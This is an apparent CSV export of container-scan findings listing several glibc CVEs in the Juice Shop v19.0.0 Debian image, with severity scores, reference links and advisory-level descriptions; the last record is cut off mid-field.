17:37:04.826807+00:00,,,,,0,[],,,S2,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-5435 NEWLINE https://inbox.sourceware.org/libc-announce/7a655d55-276f-41fe-b550-feb3ebb2ce91@redhat.com/T/#u NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-5435 NEWLINE https://sourceware.org/bugzilla/show_bug.cgi?id=34033 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-5435,Admin User (admin),1,,,False,,,,,,,Medium,,,90,90,2026-08-10,2026-08-10,,,,True,,Trivy Scan,3,0,CVE-2026-5435 Libc6 2.36-9+deb12u10,False,False,,2026-05-12 17:37:04.826760+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-5435,debian; os-pkgs,"Active, Verified", +,,True,0,[],libc6,2.36-9+deb12u10,2026-05-12 17:37:04.830666+00:00,CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:H,5.0,,,122,2026-05-12,,,glibc: glibc: Heap Buffer Overflow in `scanf` with `%mc` format specifier and large width NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** NEWLINE NEWLINE Calling the scanf family of functions with a %mc (malloc'd character match) in the GNU C Library version 2.7 to version 2.43 with a format width specifier with an explicit width greater than 1024 could result in a one byte heap buffer overflow. NEWLINE ,False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,False,,False,False,,False,,37eb7b9fbd0f9b50b1f0067b2d3046cece76d14c75a68378d3becd54cb182e17,37,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.830724+00:00,,,,,0,[],,,S2,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-5450 NEWLINE https://inbox.sourceware.org/libc-announce/b11f0003-6ec1-4bd6-b9de-9e38a4efeca3@redhat.com/T/#u NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-5450 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-5450#range-21286997 NEWLINE https://sourceware.org/bugzilla/show_bug.cgi?id=CVE-2026-5450 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-5450,Admin User (admin),1,,,False,,,,,,,Medium,,,90,90,2026-08-10,2026-08-10,,,,True,,Trivy Scan,3,0,CVE-2026-5450 Libc6 2.36-9+deb12u10,False,False,,2026-05-12 17:37:04.830675+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-5450,debian; os-pkgs,"Active, Verified", +,,True,0,[],libc6,2.36-9+deb12u10,2026-05-12 17:37:04.834490+00:00,CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:H,5.0,,,127,2026-05-12,,,"glibc: glibc: Information disclosure or denial of service via ungetwc function with specific wide character encodings NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** NEWLINE NEWLINE Calling the ungetwc function on a FILE stream with wide characters encoded in a character set that has overlaps between its single byte and multi-byte character encodings, in the GNU C Library version 2.43 or earlier, may result in an attempt to read bytes before an allocated buffer, potentially resulting in unintentional disclosure of neighboring data in the heap, or a program crash. NEWLINE NEWLINE A bug in the wide character pushback implementation (_IO_wdefault_pbackfail in libio/wgenops.c) causes ungetwc() to operate on the regular character buffer (fp->_IO_read_ptr) instead of the actual wide-stream read pointer (fp->_wide_data->_IO_read_ptr). The program crash may happen in cases where fp->_IO_read_ptr is not initialized and hence points to NULL. The buffer under-read requires a special situation where the input character encoding is such that there are overlaps between single byte representations and multibyte representations in that encoding, resulting in spurious matches. The spurious match case is not possible in the standard Unicode character sets. NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,False,,False,False,,False,,410bde0ff2061433a358317ef3ca49647a06a1adca54645398bf89f979ce86b0,38,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.834555+00:00,,,,,0,[],,,S2,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-5928 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-5928 NEWLINE https://sourceware.org/bugzilla/show_bug.cgi?id=33998 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-5928,Admin User (admin),1,,,False,,,,,,,Medium,,,90,90,2026-08-10,2026-08-10,,,,True,,Trivy Scan,3,0,CVE-2026-5928 Libc6 2.36-9+deb12u10,False,False,,2026-05-12 17:37:04.834499+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-5928,debian; os-pkgs,"Active, Verified", +,,True,0,[],libc6,2.36-9+deb12u10,2026-05-12 17:37:04.838758+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H,6.5,,,126,2026-05-12,,,"glibc: glibc: Application crash or uninitialized memory read via crafted DNS response NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** NEWLINE NEWLINE The deprecated functions ns_printrrf, ns_printrr and fp_nquery in the GNU C Library version 2.2 and newer fail to validate the RDATA content against the RDATA length in a DNS response when processing LOC, CERT, TKEY or TSIG records, which may allow an attacker to craft a DNS response, causing a target application to crash or read uninitialized memory. NEWLINE NEWLINE These functions are for application debugging only and hence not in the path of code executed by the DNS resolver. Further, they have been deprecated since version 2.34 and should not be used by any new applications. Applications should consider porting away from these interfaces since they may be removed in future versions. NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,False,,False,False,,False,,0692a10100b2704de9fc8fd13c3c0dd6f0dcadf5db422b5d39ae9f1b33ded6e2,39,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.838894+00:00,,,,,0,[],,,S2,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-6238 NEWLINE https://inbox.sourceware.org/libc-announce/7a655d55-276f-41fe-b550-feb3ebb2ce91@redhat.com/T/#u NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-6238 NEWLINE https://sourceware.org/bugzilla/show_bug.cgi?id=34069 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-6238,Admin User (admin),1,,,False,,,,,,,Medium,,,90,90,2026-08-10,2026-08-10,,,,True,,Trivy Scan,3,0,CVE-2026-6238 Libc6 2.36-9+deb12u10,False,False,,2026-05-12 17:37:04.838769+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-6238,debian; os-pkgs,"Active, Verified", +,,True,0,[],,,2026-05-12 17:37:04.580044+00:00,,,,,79,2026-05-12,,,"**Result message:** Cannot determine what 'subs' is and it is used with a '